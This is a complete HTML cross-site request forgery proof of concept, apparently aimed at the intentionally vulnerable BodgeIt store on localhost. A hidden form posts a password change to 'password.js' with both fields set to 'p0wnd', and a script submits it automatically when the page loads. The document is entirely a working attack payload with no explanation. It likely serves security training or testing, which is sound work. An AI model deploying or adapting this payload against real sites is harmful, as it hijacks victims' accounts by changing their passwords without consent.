<FORM NAME="poc" ENCTYPE="application/x-www-form-urlencoded"
action="http://127.0.0.1:8000/bodgeit/password.js" METHOD="POST">
<input type="hidden" name='password1' value="p0wnd">
<input type="hidden" name='password2' value="p0wnd">
</FORM>
<script>document.poc.submit();</script>
